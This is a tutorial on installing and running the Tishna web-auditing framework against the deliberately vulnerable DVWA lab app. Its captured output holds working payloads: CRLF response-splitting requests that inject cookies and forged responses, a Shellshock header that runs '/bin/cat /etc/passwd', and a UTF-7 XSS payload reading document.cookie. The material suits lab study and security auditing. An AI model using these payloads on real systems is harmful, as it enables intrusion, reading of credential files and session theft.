How to Audit Web Applications & Servers with Tishna

May 18, 2020 10:43 PM
637147745292022328.jpg

Penetration-testing frameworks can be incredibly useful since they often streamline certain processes and save time by having a lot of tools available in one place. Of course, the most popular pentesting framework is undoubtedly Metasploit, but there are many others out there that cater to particular needs. For auditing web applications and servers, Tishna comes in handy.

The Tishna pentesting framework is designed to automate some of the processes involved in auditing web apps and web servers. The tool is useful for administrators and IT professionals in that it can audit critical applications, like those used in banks and other enterprise environments. It's also beneficial from an attacker's point of view since it can scan and enumerate a variety of services and check for specific vulnerabilities.

Tishna offers a self-contained framework that utilizes a variety of modules and scripts to perform its functions. It's false-positive-free, so if it finds something, it'll show the results regardless. If it doesn't find anything, it will return blank results rather than errors. Tishna can be integrated and installed to the system and has been tested on popular pentesting Linux distros such as Kali, Parrot OS, and BlackArch.

Installing Tishna

In this tutorial, we'll be using DVWA, part of the Metasploitable 2 virtual machine, as the target, and Kali Linux as our local machine. To follow along, you can do the same, but you can also use a similar setup if you have another pentesting lab.

To get started, we can clone into the GitHub repository so that we can install Tishna to our system. Use the git command:

~# git clone https://github.com/haroonawanofficial/Tishna.git

Cloning into 'Tishna'...
remote: Enumerating objects: 17, done.
remote: Counting objects: 100% (17/17), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 571 (delta 7), reused 0 (delta 0), pack-reused 554
Receiving objects: 100% (571/571), 191.52 KiB | 1.23 MiB/s, done.
Resolving deltas: 100% (276/276), done.

Next, change into the newly created directory:

~# cd Tishna/

And use ls to verify the contents of the repo:

~/Tishna# ls

2fa.sh               bufferlocal.pl            crawler.py    httpsmethods1.sh   kra.sh              phantomxsspayloads    rfi.pl             tishna.pl          xpath.sh
amazon.sh            bypassdnshistory.sh       crawler.sh    httpsmethods2.sh   lfi.sh              phantomxsspayload.sh  rfi.sh             tpl.sh             xsrfprobe.sh
angularjs1.sh        bypassdnshistorystart.sh  crlfpayloads  httpverb.sh        load                postcurl.sh           session.sh         Uninstaller.sh     xsslint
angularjs.sh         cachepoison               curl_sender   ip2bin.sh          mutatedxsspayloads  README.md             shellshock.sh      vasl.sh            xss.sh
angularxsspayloads   check.pl                  curl.sh       ip2decimal.pl      oauth.sh            reflectedxsspayloads  shocker.sh         wafbypasspayloads  xss_to_csrf_token_hijack
banar.sh             commix.sh                 cvsinjection  ip2hex.pl          optionsbleed        request               ssrfmap.sh         websocket.sh       XXEinjector.rb
binary.sh            config.xml                fux.sh        json.sh            optionsbleed.sh     request1              ssrf-see-surf.sh   xmlrpc2.sh         xxeinjector.sh
browsercachechecker  cookiestealer.sh          htmlmethod    Kali_Installer.sh  oxml_xxe.sh         reverip.pl            storedxsspayloads  xmlrpc.sh          xxe_payloads_curl

To run the installation script, and to make the other scripts Tishna uses functional, we need to make anything ending in .sh executable. Use the chmod command along with a wildcard to make these scripts executable:

~/Tishna# chmod u+x *.sh

Now, we can run the script to install Tishna to the system:

~/Tishna# ./Kali_Installer.sh

     ....###########...########....######....##...##....##.......##....########....
      .......##...........##.......##..##....##...##....##.#.....##....##....##.......
          ...##...........##.......##........##...##....##..#....##....##....##...
           ..##...........##.......######....#######....##...##..##....########..
          ...##...........##...........##....##...##....##.....#.##....##....##...
      .......##...........##.......##..##....##...##....##......###....##....##.......
         ....##........########....######....##...##....##.......##....##....##....
                Powerful and A.I. Based Web Security Swiss Knife     Version 1.0a
                                [Coded By: Haroon Awan]
                            [Contact: mrharoonawan@gmail.com]

 [+] tishna Will Be Installed In Your System
 [+] Installing Perl ...
Reading package lists... Done
Building dependency tree
Reading state information... Done
perl is already the newest version (5.30.0-9).
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
 [+] Installing JSON Module ...
Loading internal logger. Log::Log4perl recommended for better logging

CPAN.pm requires configuration, but most of it can be done automatically.
If you answer 'no' below, you will enter an interactive dialog for each
configuration option instead.

Would you like to configure as much as possible automatically? [yes]

This part will take some time as it'll install a bunch of stuff and take care of any dependencies that are needed. When it's done, it'll drop us right into the framework:

::::::::::::::: .::::::.   ::   .: :::.    :::.  :::.
    ;;;;;;;;'''';;;;;;`    `  ,;;   ;;,`;;;;,  `;;;  ;;`;;
         [[     [[['[==/[[[[,,[[[,,,[[[  [[[[[. '[[ ,[[ '[[,
         $$     $$$  '''    $"$$$"""$$$  $$$ "Y$c$$c$$$cc$$$c
         88,    888 88b    dP 888   "88o 888    Y88 888   888,
         MMM    MMM  "YMmMY"  MMM    YMM MMM     YM YMM   ""`

    Mail                mrharoonawan@gmail.com
    Homepage            http://www.instagram.com/Hackeruniversee
    Channel             http://www.youtube.com/c/HackerUniverse
    Facebook            fb.com/officialharoonawan
    Instagram           http://www.instagram.com/hackerfromscratch

         [Artificial Intelligence Based Web Security Swiss Knife]

                 Programmer: Haroon Awan

    #-------------------------------------------------------#
    #                                                       #
    |   [1]  Audit HTTP Methods                             |
    |   [2]  Extract Response Header                        |
    |   [3]  Extract Images                                 |
    |   [4]  Extract URLS                                   |
    |   [5]  Identify Form                                  |
    |   [6]  Find XSS in Forms Advanced Attack              |
    |   [7]  Find XSS in Forms Simple Attack                |
    |   [8]  Web Server Mount Response Splitting Attack     |
    |   [9]  Header Inject Poison                           |
    |   [10]  Cache Poison Defacer                          |
    |   [11]  CRLF Response Splitting Attack & Fuzzer       |
    |   [12]  HTTP Response Smuggling Fuzzing               |
    |   [13]  Web Cache Deception Attack Check              |
    |   [14]  HTTP Methods Information                      |
    |   [15]  Custom CSRF Injection Request                 |
    |   [16]  Load CSRF HTML Templates                      |
    |   [17]  Shell Shock                                   |
    |   [18]  Cross Site Request Forgery Audit Toolkit  |
    |   [19]  Find Available HTTP Methods                   |
    |   [20]  Find XSS in Parameters using Screaming Cobra  |
    |   [21]  Find Missing HTTPS Methods                    |
    |   [22]  Server Side Request Forgery                   |
    |   [23]  Find Available HTTPS Methods                  |
    |   [24]  Audit XML RPC Methods, Extract All Information|
    |   [25]  Cookie Stealer XSS Localhost Server           |
    |   [26]  Command Inections Exploits                    |
    |   [27]  Show JSON Endpoint List                       |
    |   [28]  Perform Blind,Encoded,Responsive XXE Injection|
    |   [29]  Perform File Upload Injections                |
    |   [30]  Perform Side Side Template Injection          |
    |   [31]  Perform JSON Web Token Injection              |
    |   [32]  Perform Web Socket Injection                  |
    |   [33]  Perform Amazon Bucket Injection 101 aws amazon|
    |   [34]  Extract Cnames Records for Hijacking          |
    |   [35]  Insecure Direct Object Reference - BURP       |
    |   [36]  Perform CSV Injection                         |
    |   [37]  Perform XPATH Injection                       |
    |   [38]  Find SQL,XPATH,ASP,X,JAVA,JAVASCRIPT,PHP bugs |
    |   [39]  Find XPath and SQL Parameter Injection        |
    |   [40]  Show TWO-Factor Authenitcation Payloads       |
    |   [41]  Mutated XSS payloads                          |
    |   [42]  Stored XSS payloads                           |
    |   [43]  Reflected XSS payloads                        |
    |   [44]  Waf Bypass payloads                           |
    |   [45]  Find XSS Using Response Spliting              |
    |   [46]  Extract Links - Advanced                      |
    |   [47]  Download Images - Exif Data                   |
    |   [48]  Simple Response Splitting Attack              |
    |   [49]  Double Response Splitting Attack              |
    |   [50]  HTTP Cache Poison Attack                      |
    |   [51]  HTTP Cache Inject Poison                      |
    |   [52]  HTTP Fuzzer                                   |
    |   [53]  IP Obfuscating                                |
    |   [54]  RFI                                           |
    |   [55]  LFI                                           |
    |   [56]  Binary Buffer Overflow Finder                 |
    |   [57]  Stored and Reflected XSS Angular JS Payloads  |
    |   [58]  Phantom JS XSS Payload Helper                 |
    |   [59]  Agular JS Client Side Automatic XSS Finder    |
    |   [60]  Session Hijacking Burp Method                 |
    |   [61]  OAUTH Injections                              |
    |   [62]  Bypass Firewall using DNS History             |
    |   [0] Exit                                            |
    #                                                       #
    #-------------------------------------------------------#

tishna: _>

This gives us a custom command prompt and all the modules that are available.

Using Tishna

First, open DVWA and log in using the default credentials (admin/password). Next, go to the security page and set the level to low, which will ensure our testing works with minimal interruptions:

637147757329522625.jpg

To use Tishna, simply enter the corresponding number of the module to use at the prompt. For instance, to run the module to audit HTTP methods, enter 1 at the prompt:

tishna: _>  1

Instructions will be provided on the screen and will vary depending on the module in use. For this particular one, we just need to enter the URL of the target:

tishna: _>  http://10.10.0.50/dvwa/

                                [ + ] Printing HTTP Headers [ + ]

Cache-Control: no-cache, must-revalidate
Connection: close
Date: Wed, 19 Jun 2019 18:13:56 GMT
Pragma: no-cache
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Type: text/html;charset=utf-8
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Client-Date: Fri, 10 May 2020 15:33:44 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Client-Transfer-Encoding: chunked
Link: <dvwa/css/login.css>; rel="stylesheet"; type="text/css"
Title: Damn Vulnerable Web App (DVWA) - Login
X-Powered-By: PHP/5.2.4-2ubuntu5.24

 [!] Press [ENTER] To Continue

This will print some header information, including the type of server and information about what's running on it. Now, let's try another one. Enter 2 at the prompt to run the module to extract the response header:

tishna: _>  2

Just like before, enter the URL of the target to kick it off:

tishna: _>  http://10.10.0.50/dvwa/

                                [ + ] Checking OPTIONS method [ + ]

                                ===================================
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 19 Jun 2019 18:16:36 GMT
Pragma: no-cache
Location: login.php
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Client-Date: Fri, 10 May 2020 15:36:24 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Set-Cookie: PHPSESSID=29f47a2a8851dfd1314e941dd79da97d; path=/
Set-Cookie: security=high
X-Powered-By: PHP/5.2.4-2ubuntu5.24

                                [ + ] Checking PUT method [ + ]

                                ===================================
PUT http://10.10.0.50/dvwa/
Content-Length: 11
Content-Type: application/x-www-form-urlencoded

param=hello

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 19 Jun 2019 18:16:36 GMT
Pragma: no-cache
Location: login.php
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Set-Cookie: PHPSESSID=29f47a2a8851dfd1314e941dd79da97d; path=/
Set-Cookie: security=high
X-Powered-By: PHP/5.2.4-2ubuntu5.24

                                [ + ] Checking HEAD method [ + ]

                                ===================================
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Wed, 19 Jun 2019 18:16:36 GMT
Pragma: no-cache
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Type: text/html;charset=utf-8
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Client-Date: Fri, 10 May 2020 15:36:24 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Set-Cookie: PHPSESSID=fd6853278e8d9b9784a0a8ea6ef89103; path=/
Set-Cookie: security=high
X-Powered-By: PHP/5.2.4-2ubuntu5.24

                                [ + ] Checking TRACE method [ + ]

                                ===================================
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jun 2019 18:16:37 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Type: message/http
Client-Date: Fri, 10 May 2020 15:36:25 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Client-Transfer-Encoding: chunked

TRACE /dvwa/ HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.10.0.50
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0.

                                [ + ] Checking JEFF method [ + ]

                                ===================================
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 19 Jun 2019 18:16:37 GMT
Pragma: no-cache
Location: login.php
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Client-Date: Fri, 10 May 2020 15:36:25 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Set-Cookie: PHPSESSID=623bdf1d787a475f8a9fe99f56b25f30; path=/
Set-Cookie: security=high
X-Powered-By: PHP/5.2.4-2ubuntu5.24

                                [ + ] Checking FOOBAR method [ + ]

                                ===================================
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 19 Jun 2019 18:16:37 GMT
Pragma: no-cache
Location: login.php
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Client-Date: Fri, 10 May 2020 15:36:25 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Set-Cookie: PHPSESSID=c1bac7258c1b241ce2a3b2494eb5371f; path=/
Set-Cookie: security=high
X-Powered-By: PHP/5.2.4-2ubuntu5.24

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 19 Jun 2019 18:16:37 GMT
Pragma: no-cache
Location: login.php
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Client-Date: Fri, 10 May 2020 15:36:25 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Set-Cookie: PHPSESSID=c1bac7258c1b241ce2a3b2494eb5371f; path=/
Set-Cookie: security=high
X-Powered-By: PHP/5.2.4-2ubuntu5.24

                                [ + ] Checking CATS method [ + ]

                                ===================================
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 19 Jun 2019 18:16:37 GMT
Pragma: no-cache
Location: login.php
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Client-Date: Fri, 10 May 2020 15:36:25 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Set-Cookie: PHPSESSID=340011352237a83e1751bd10c2e3f2c3; path=/
Set-Cookie: security=high
X-Powered-By: PHP/5.2.4-2ubuntu5.24

We can see the different response header information returned to us. We can attempt to extract any images being served with module 3 — enter it at the prompt:

tishna: _>  3

Once we give it the URL, it will search for any images and save them in the directory we cloned from GitHub:

tishna: _>  http://10.10.0.50/dvwa/

dvwa/images/login_logo.png

Another handy module is the web crawler that can be used to extract any additional URLs. Enter 4 at the prompt:

tishna: _>  4

Next, select a crawler to use — we'll use option 1, the default Perl crawler:

tishna: _>

 [!] 1 - Enter Perl Crawler Mode
 [!] 2 - Enter Python Crawler Mode
 [!] Select An Option:

Then, enter the target URL and it will attempt to locate other directories:

tishna: _>

 [!] 1 - Enter Perl Crawler Mode
 [!] 2 - Enter Python Crawler Mode
 [!] Select An Option: 1
 [!] Enter Victim URL: http://10.10.0.50
/twiki/
/phpMyAdmin/
/mutillidae/
/dvwa/
/dav/

We can attempt to fuzz for HTTP response smuggling, which is basically a technique used to trick a server into exporting HTTP responses to a client via HTTP. Enter 12 at the prompt to use this module:

tishna: _> 12

Enter the URL of the target and it will begin fuzzing:

tishna: _>

 [!] Caution: Note that HTTP Smuggling does *not* exploit any vulnerability in the target web application.
          Therefore, it can be difficult to convince the client for countermeasures

 [!] Enter URL: http://10.10.0.50/dvwa/
HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 19 Jun 2019 18:35:39 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 335
Content-Type: text/html; charset=iso-8859-1
Client-Date: Fri, 10 May 2020 15:55:27 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Title: 404 Not Found

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /dvwa/
Set-Cookie: HTTP_response_splitting=YES
Foo: bar was not found on this server.</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 10.10.0.50 Port 80</address>
</body></html>
 [!] Requested Data
GET http://10.10.0.50/dvwa/%0d%0aSet-Cookie:%20HTTP_response_splitting%3dYES%0d%0aFoo:%20bar
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0.

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 19 Jun 2019 18:35:39 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 333
Content-Type: text/html; charset=iso-8859-1
Client-Date: Fri, 10 May 2020 15:55:27 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Title: 404 Not Found

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /dvwa/
Set-Cookie: HTTP_response_splitting=YES
Foo: bar was not found on this server.</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 10.10.0.50 Port 80</address>
</body></html>
 [!] Requested Data
GET http://10.10.0.50/dvwa/%0aSet-Cookie:%20HTTP_response_splitting%3dYES%0aFoo:%20bar
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0.

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 19 Jun 2019 18:35:39 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 333
Content-Type: text/html; charset=iso-8859-1
Client-Date: Fri, 10 May 2020 15:55:27 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Title: 404 Not Found

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
Foo: bar was not found on this server.</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 10.10.0.50 Port 80</address>
</body></html>
 [!] Requested Data
GET http://10.10.0.50/dvwa/%0dSet-Cookie:%20HTTP_response_splitting%3dYES%0dFoo:%20bar
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0.

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 19 Jun 2019 18:35:39 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 414
Content-Type: text/html; charset=iso-8859-1
Client-Date: Fri, 10 May 2020 15:55:27 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Title: 404 Not Found

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /dvwa/
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 35

&lt;html&gt;Sorry, System Down&lt;/html&gt; was not found on this server.</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 10.10.0.50 Port 80</address>
</body></html>
 [!] Requested Data
GET http://10.10.0.50/dvwa/%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a%3Chtml%3ESorry,%20System%20Down%3C/html%3E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0.

 [!]
 [!] Starting Curl Based Payloads
curl: (3) URL using bad/illegal format or missing URL
curl: (3) URL using bad/illegal format or missing URL

[ + ] Reflection found for word Sorry, of regex, do confirm manually

Another useful module is the one that will check for Shellshock vulnerabilities — load it by entering 17 at the prompt:

tishna: _>  17

This one will test for the Shellshock vulnerability relating to CGI. We'll use the first option here:

tishna: _>

 [!] Caution :
 [!] Shellshock work on vulernable cgi modes, files or directories
 [!] Make sure victim relates to cgi
 [!] Examine properly each response
 [!] 1 - ShellShocker Type 1
 [!] 2 - ShellShocker Type 2
 [!] Enter Option: 1

It then gives us the suggested path to test for, although we can also enter a custom URL. Once it starts, it will run through a bunch of different payloads testing for Shellshock:

[!] Default would be target/cgi-bin/status
[!] Custom input is also possible
[+] Enter Target: http://10.10.0.50/dvwa/

...

* Connection #0 to host 10.10.0.50 left intact
*   Trying 10.10.0.50:80...
* TCP_NODELAY set
* Connected to 10.10.0.50 (10.10.0.50) port 80 (#0)
> GET /dvwa/ HTTP/1.1
> Host: 10.10.0.50
> User-Agent: curl/7.67.0
> Accept: */*
> custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Wed, 19 Jun 2019 19:01:27 GMT
< Server: Apache/2.2.8 (Ubuntu) DAV/2
< X-Powered-By: PHP/5.2.4-2ubuntu5.24
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Set-Cookie: PHPSESSID=189dfca994fc79404982b76c081684fb; path=/
< Set-Cookie: security=high
< Location: login.php
< Content-Length: 0
< Content-Type: text/html
<
* Connection #0 to host 10.10.0.50 left intact
./shellshock.sh: line 152: syntax error near unexpected token `('
./shellshock.sh: line 152: `curl -v "User-agent: () { _; } >_[$($())] { echo hi mom; id; }"'

We can see this ended in an error, but it can still be useful nonetheless.

There are also a number of modules that can be used to test for XSS vulnerabilities, including using response splitting to do so. Enter 45 at the prompt to use this module:

tishna: _>  45

First, let's navigate to the XSS page of DVWA to grab the URL:

637147759139835290.jpg

Then, we can enter it at the prompt to kick it off:

tishna: _>

 [!] Enter URL: http://10.10.0.50/dvwa/vulnerabilities/xss_r/

[ + ] Checking HTTP Response Splitting [ + ]
HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 19 Jun 2019 19:13:41 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 498
Content-Type: text/html; charset=iso-8859-1
Client-Date: Fri, 10 May 2020 16:33:29 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Title: 404 Not Found

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /dvwa/vulnerabilities/xss_r/
Content-Type: text/html;charset=UTF-7
Content-Length: 129

+ADw-html+AD4-+ADw-body+AD4-+ADw-script+AD4-alert('XSS,cookies:'+-document.cookie)+ADw-/script+AD4-+ADw-/body+AD4-+ADw-/html+AD4 was not found on this server.</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 10.10.0.50 Port 80</address>
</body></html>
[ + ] Reflection found, do confirm manually

We can see it returned with a potential reflection and tells us to confirm manually.

There are a lot of modules available in Tishna, but be aware that not all of them work correctly. This project is being actively developed, though, so even though it's not perfect, it is still useful and will likely improve in the future.

Wrapping Up

In this tutorial, we learned how to use a pentesting framework called Tishna to audit and enumerate a vulnerable web app. First, we set up the tool and installed it on our system. Then, we explored some of the modules it contains, such as those used to gather HTTP header information, extract images and URLs, and test for vulnerabilities such as XSS and Shellshock. Tishna is a handy tool that can automate some of the processes involved in auditing web applications and servers.

Cover image by Kvistholt Photography/Unsplash; Screenshots by drd_/Null Byte

Comments

No Comments Exist

Be the first, drop a comment!